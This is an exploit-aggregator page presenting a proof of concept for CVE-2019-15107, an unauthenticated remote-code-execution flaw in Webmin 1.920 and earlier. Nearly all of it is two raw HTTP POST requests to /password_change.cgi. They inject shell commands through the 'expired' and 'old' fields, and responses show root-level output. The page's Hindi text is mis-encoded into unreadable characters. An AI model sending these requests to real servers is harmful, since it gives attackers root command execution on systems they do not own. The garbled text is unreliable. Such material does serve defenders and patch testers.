Sploitus

Exploit for CVE-2019-15107

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN58 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RUTHVIKVEGUNTA-CVE-2019-15107
# CVE-2019-15107 Webmin RCE <=1.920 (рдЕрдирдЕрдереЗрдВрдЯрд┐рдХреЗрдЯреЗрдб)

root@kitploit:~
    
    
    1.  Webmin <=1.920
    2.  рдкрд╛рд╕рд╡рд░реНрдб рд░реАрд╕реЗрдЯ рдлрдВрдХреНрд╢рди рд╕рдХреНрд╖рдо рд╣реЛрдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ
    

### v1.890 POC

root@kitploit:~
    
    
    POST /password_change.cgi HTTP/1.1
    Host: 10.11.1.88:10000
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: redirect=1; testing=1; sid=x; sessiontest=1
    Referer: http://10.11.1.88:10000/session_login.cgi
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 60
    
    expired=id
    
    <h1>Error - Perl execution Failed</h1>
    <p>рдЖрдкрдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб рд╕рдорд╛рдкреНрдд рд╣реЛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдПрдХ рдирдпрд╛ рдЪреБрдирд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдПредuid=0(root) gid=0(root) groups=0(root)
    </p>
    

### <=v1.920 & !=v1.890 POC

root@kitploit:~
    
    
    POST /password_change.cgi HTTP/1.1
    Host: 10.11.1.88:10000
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: redirect=1; testing=1; sid=x; sessiontest=1
    Referer: http://10.11.1.88:10000/session_login.cgi
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 60
    
    user=root&pam=&expired=2&old=vrvik|id&new1=vrvik&new2=vrvik
    
    
    <div class="panel-body">
    <hr>
    <center><h3>рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓рдиреЗ рдореЗрдВ рд╡рд┐рдлрд▓ : рд╡рд░реНрддрдорд╛рди рдкрд╛рд╕рд╡рд░реНрдб рдЧрд▓рдд рд╣реИuid=0(root) gid=0(root) groups=0(root)
    </h3></center>